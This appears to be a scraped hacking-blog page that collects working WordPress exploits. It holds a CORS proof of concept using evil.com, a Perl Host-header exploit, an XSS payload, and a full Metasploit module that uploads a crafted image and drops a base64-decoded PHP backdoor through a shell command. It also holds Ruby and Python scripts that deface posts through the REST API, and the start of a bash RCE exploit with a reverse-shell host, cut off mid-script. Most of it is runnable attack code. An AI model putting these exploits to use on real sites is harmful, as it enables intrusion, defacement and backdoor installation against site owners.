# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing
# Date: 2019-10-28
# Exploit Author: Milad Khoshdel
# Software Link: https://wordpress.org/download/
# Version: Wordpress 5.2.4
# Tested on: Linux Apache/2 PHP/7.2
# Vulnerable Page:
https://[Your-Domain]/wp-json
# POC:
# The web application fails to properly validate the Origin header (check Details section for more information)
# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue
# requests made with user credentials and read the responses to these requests. Trusting arbitrary
# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites.
# REGUEST -->
GET /wp-json/ HTTP/1.1
Origin: https://www.evil.com
Accept: */*
Accept-Encoding: gzip,deflate
Host: [Your-Domain]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-alive
# RESPONSE -->
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 07:34:39 GMT
Server: NopeJS
X-Robots-Tag: noindex
Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: GET
Access-Control-Allow-Origin: https://www.evil.com
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin,Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=73
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8
Original-Content-Encoding: gzip
Content-Length: 158412
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149335
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/perl -w
#
# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Type: Remote
# Risk: High
#
# Solution:
# Set security headers to web server and no-cache for Cache-Control
#
# Simple Attack Scenarios:
#
# o This attack can bypass Simple WAF to access restricted content on the web server,
# something like phpMyAdmin;
#
# o This attack can deface the vulnerable Wordpress website with content from the default vhost;
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# # ====================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # > Host => default-vhost.com
# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# # > Content-Type => application/x-www-form-urlencoded
# # < Connection => close
# # < Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < Location => https://default-vhost.com/
# # < Server => nginx
# # < Content-Type => text/html; charset=UTF-8
# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < Client-Peer => 13.37.13.37:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
# # < Client-SSL-Cert-Subject => /CN=default-vhost.com
# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Client-Transfer-Encoding => chunked
# # < Strict-Transport-Security => max-age=31536000;
# # < X-Powered-By => PHP/7.3.9
# # < X-Redirect-By => WordPress
# # ====================================================================================
#
#
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
my $host = shift || '';
my $attacker = shift || 'default-vhost.com';
say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
if ($host !~ m/^http/){
say "# e.g. perl $0 https://target:port/ default-vhost.com";
exit;
}
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
say "# ====================================================================================";
# Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS
# Date: 31/12/2020
# Exploit Author: gx1 <g.per45[at]gmail.com>
# Vulnerability Discovery: Simon Scannell
# Vendor Homepage: https://wordpress.com/
# Software Link: https://github.com/WordPress/WordPress
# Version: <= 5.2.2
# Tested on: any
# CVE: CVE-2019-16223
# References:
https://nvd.nist.gov/vuln/detail/CVE-2019-16223
https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
Description:
WordPress before 5.2.3 allows XSS in post previews by authenticated users.
Technical Details and Exploitation:
The vulnerability is due to two condition:
1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be passed and can lead to cross-site scripting vulnerability:
the function sanitizes bad protocols, and applies a convertion of HTML entities to avoid bypass techniques; anyway, in vulnerable versions, it only checks for html entities after two points, as it is possible to
observe by the applied fix:
============================================================================================================================================
function wp_kses_bad_protocol_once( $string, $allowed_protocols, $count = 1 ) {
+ $string = preg_replace( '/(�*58(?![;0-9])|�*3a(?![;a-f0-9]))/i', '$1;', $string ); # APPLIED FIX AFTER VULNERABILITY DETECTION
$string2 = preg_split( '/:|�*58;|�*3a;/i', $string, 2 );
if ( isset( $string2[1] ) && ! preg_match( '%/\?%', $string2[0] ) ) {
============================================================================================================================================
This allows an attacker to inject attack strings such as:
============================================================================================================================================
<a href="javascript:alert(document.domain)">Example Attack</a>
============================================================================================================================================
Anyway, Wordpress protects against this attack because it converts any type of html entities during the rendering of posts. In a particular case, during preview, it is possible to inject html entities in a URL. That is the second condition.
2. During preview, get_the_content() function in post-template.php replaces URL encoded characters with a corresponding HTML entity:
============================================================================================================================================
function get_the_content( $more_link_text = null, $strip_teaser = false ) {
...
if ( $preview ) // Preview fix for JavaScript bug with foreign languages.
$output = preg_replace_callback( '/\%u([0-9A-F]{4})/', '_convert_urlencoded_to_entities', $output );
return $output;
}
function _convert_urlencoded_to_entities( $match ) {
return '&#' . base_convert( $match[1], 16, 10 ) . ';';
}
============================================================================================================================================
For this reason, it is possible to send URL encoded strings that will be converted in HTML entities during preview. HTML entities can be crafted to bypass wp_ses_bad_protocol_once() function due to issue described in condition 1.
Proof Of Concept:
1. Create a new post
2. Insert in code editor the following HTML PoC code:
<a href="javascript%u003Aalert(/XSS/)">poc</a>
3. Click on preview and click the "poc" link
Solution:
Upgrade Wordpress to version >= 5.2.3
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Crop-image Shell Upload',
'Description' => %q{
This module exploits a path traversal and a local file inclusion
vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
The crop-image function allows a user, with at least author privileges,
to resize an image and perform a path traversal by changing the _wp_attached_file
reference during the upload. The second part of the exploit will include
this image in the current theme by changing the _wp_page_template attribute
when creating a post.
This exploit module only works for Unix-based systems currently.
},
'License' => MSF_LICENSE,
'Author' =>
[
'RIPSTECH Technology', # Discovery
'Wilfried Becard <wilfried.becard@synacktiv.com>' # Metasploit module
],
'References' =>
[
[ 'CVE', '2019-8942' ],
[ 'CVE', '2019-8943' ],
[ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
],
'DisclosureDate' => 'Feb 19 2019',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['WordPress', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
])
end
def check
cookie = wordpress_login(username, password)
if cookie.nil?
store_valid_credential(user: username, private: password, proof: cookie)
return CheckCode::Safe
end
CheckCode::Appears
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def get_wpnonce(cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie
)
if res && res.code == 200 && res.body && !res.body.empty?
res.get_hidden_inputs.first["_wpnonce"]
end
end
def get_wpnonce2(image_id, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie,
'vars_get' => {
'post' => image_id,
'action' => "edit"
}
)
if res && res.code == 200 && res.body && !res.body.empty?
tmp = res.get_hidden_inputs
wpnonce2 = tmp[1].first[1]
end
end
def get_current_theme
uri = normalize_uri(datastore['TARGETURI'])
res = send_request_cgi!(
'method' => 'GET',
'uri' => uri
)
fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?
theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme
theme
end
def get_ajaxnonce(cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => 'query-attachments',
'post_id' => '0',
'query[item]' => '43',
'query[orderby]' => 'date',
'query[order]' => 'DESC',
'query[posts_per_page]' => '40',
'query[paged]' => '1'
}
)
fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty?
a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce
a_nonce
end
def upload_file(img_name, wp_nonce, cookie)
img_data = %w[
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F
74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00
10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00
3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69
6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D
20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09
08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D
27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06
09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF
C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06
07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01
02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1
15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38
39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73
74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4
A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4
D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF
C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06
07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00
01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09
23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37
38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A
73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2
A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2
D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF
DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B
3F 3E
]
img_data = [img_data.join].pack('H*')
img_name += '.jpg'
boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
post_data = "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"name\"\r\n"
post_data << "\r\n#{img_name}\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"action\"\r\n"
post_data << "\r\nupload-attachment\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"_wpnonce\"\r\n"
post_data << "\r\n#{wp_nonce}\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"async-upload\"; filename=\"#{img_name}\"\r\n"
post_data << "Content-Type: image/jpeg\r\n"
post_data << "\r\n#{img_data}\r\n"
post_data << "--#{boundary}--\r\n"
print_status("Uploading payload")
upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => upload_uri,
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'cookie' => cookie
)
fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?
print_good("Image uploaded")
res = JSON.parse(res.body)
image_id = res["data"]["id"]
update_nonce = res["data"]["nonces"]["update"]
filename = res["data"]["filename"]
return filename, image_id, update_nonce
end
def image_editor(img_name, ajax_nonce, image_id, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => 'image-editor',
'_ajax_nonce' => ajax_nonce,
'postid' => image_id,
'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
'target' => 'all',
'context' => '',
'do' => 'save'
}
)
fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty?
filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename
filename << '.jpg'
end
def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'_wpnonce' => wpnonce2,
'action' => 'editpost',
'post_ID' => image_id,
'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
}
)
end
def crop_image(image_id, ajax_nonce, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => 'crop-image',
'_ajax_nonce' => ajax_nonce,
'id' => image_id,
'cropDetails[x1]' => 0,
'cropDetails[y1]' => 0,
'cropDetails[width]' => 400,
'cropDetails[height]' => 300,
'cropDetails[dst_width]' => 400,
'cropDetails[dst_height]' => 300
}
)
end
def include_theme(shell_name, cookie)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie
)
if res && res.code == 200 && res.body && !res.body.empty?
wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id
post_title = Rex::Text.rand_text_alpha(10)
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'_wpnonce'=> wpnonce2,
'action' => 'editpost',
'post_ID' => post_id,
'post_title' => post_title,
'post_name' => post_title,
'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
}
)
fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302
post_id
end
end
def check_for_base64(cookie, post_id)
uri = normalize_uri(datastore['TARGETURI'])
# Test if base64 is on target
test_string = 'YmFzZTY0c3BvdHRlZAo='
res = send_request_cgi!(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie,
'vars_get' => {
'p' => post_id,
'0' => "echo #{test_string} | base64 -d"
}
)
fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty?
fail_with(Failure::NotFound, "Can't find base64 decode on target") unless res.body.include?("base64spotted")
# Execute payload with base64 decode
@backdoor = Rex::Text.rand_text_alpha(10)
encoded = Rex::Text.encode_base64(payload.encoded)
res = send_request_cgi!(
'method' => 'GET',
'uri' => uri,
'cookie' => cookie,
'vars_get' => {
'p' => post_id,
'0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
}
)
fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"),
'cookie' => cookie
)
end
def wp_cleanup(shell_name, post_id, cookie)
print_status('Attempting to clean up files...')
uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => { 'action' => "query-attachments" }
)
fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?
infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
id1, id2, id3 = infos[0], infos[2], infos[4]
delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
for i in (0...6).step(2)
res = send_request_cgi(
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'action' => "delete-post",
'id' => infos[i],
'_wpnonce' => infos[i+1]
}
)
end
uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri1,
'cookie' => cookie
)
if res && res.code == 200 && res.body && !res.body.empty?
post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce
uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => uri2,
'cookie' => cookie,
'vars_get' => {
'post' => post_id,
'action' => 'trash',
'_wpnonce' => post_nonce
}
)
fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302
res = send_request_cgi(
'method' => 'GET',
'uri' => uri1,
'cookie' => cookie,
'vars_get' => {
'post_status' => "trash",
'post_type' => 'post',
'_wpnonce' => post_nonce
}
)
if res && res.code == 200 && res.body && !res.body.empty?
nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first
fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
send_request_cgi(
'method' => 'GET',
'uri' => uri2,
'cookie' => cookie,
'vars_get' => {
'post' => post_id,
'action' => 'delete',
'_wpnonce' => nonce
}
)
end
end
end
def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
print_status("Authenticating with WordPress using #{username}:#{password}...")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
print_good("Authenticated with WordPress")
store_valid_credential(user: username, private: password, proof: cookie)
print_status("Preparing payload...")
@current_theme = get_current_theme
wp_nonce = get_wpnonce(cookie)
@current_date = Time.now.strftime("%Y/%m/")
img_name = Rex::Text.rand_text_alpha(10)
@filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie)
ajax_nonce = get_ajaxnonce(cookie)
@filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)
wpnonce2 = get_wpnonce2(image_id, cookie)
change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)
crop_image(image_id, ajax_nonce, cookie)
@shell_name = Rex::Text.rand_text_alpha(10)
change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
crop_image(image_id, ajax_nonce, cookie)
print_status("Including into theme")
post_id = include_theme(@shell_name, cookie)
check_for_base64(cookie, post_id)
wp_cleanup(@shell_name, post_id, cookie)
end
def on_new_session(client)
client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*")
client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
client.shell_command_token("rm #{@backdoor}.php")
end
end
# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby
require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
{
"id" => "#{postid}justrawdata",
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
puts "This site is not Vulnerable"
end
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
# - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# Update post with content from a file:
#
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!
import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
response = urllib2.urlopen(wordpress_url)
data = etree.HTML(response.read())
u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
# check if we have permalinks
if 'rest_route' in u:
print(' ! Warning, looks like permalinks are not enabled. This might not work!')
return u
def get_posts(api_base):
respone = urllib2.urlopen(api_base + 'wp/v2/posts')
posts = json.loads(respone.read())
for post in posts:
print(' - Post ID: {0}, Title: {1}, Url: {2}'
.format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
# more than just the content field can be updated. see the api docs here:
# https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
data = json.dumps({
'content': post_content
})
url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req).read()
print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
def print_usage():
print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
if __name__ == '__main__':
# ensure we have at least a url
if len(sys.argv) < 2:
print_usage()
sys.exit(1)
# if we have a post id, we need content too
if 2 < len(sys.argv) < 4:
print('Please provide a file with post content with a post id')
print_usage()
sys.exit(1)
print('* Discovering API Endpoint')
api_url = get_api_url(sys.argv[1])
print('* API lives at: {0}'.format(api_url))
# if we only have a url, show the posts we have have
if len(sys.argv) < 3:
print('* Getting available posts')
get_posts(api_url)
sys.exit(0)
# if we get here, we have what we need to update a post!
print('* Updating post {0}'.format(sys.argv[2]))
with open(sys.argv[3], 'r') as content:
new_content = content.readlines()
update_post(api_url, sys.argv[2], ''.join(new_content))
print('* Update complete!')
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
# /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
rev_host="192.168.57.1"
function prep_host_header() {
cmd="$1"
rce_cmd="\${run{$cmd}}";
# replace / with ${substr{0}{1}{$spool_directory}}
#sed 's^/^${substr{0}{1}{$spool_directory}}^g'
rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
# replace ' ' (space) with
#sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
#return "target(any -froot@localhost -be $rce_cmd null)"
host_header="target(any -froot@localhost -be $rce_cmd null)"
return 0
}
#cat exploitbox.ans
intro="
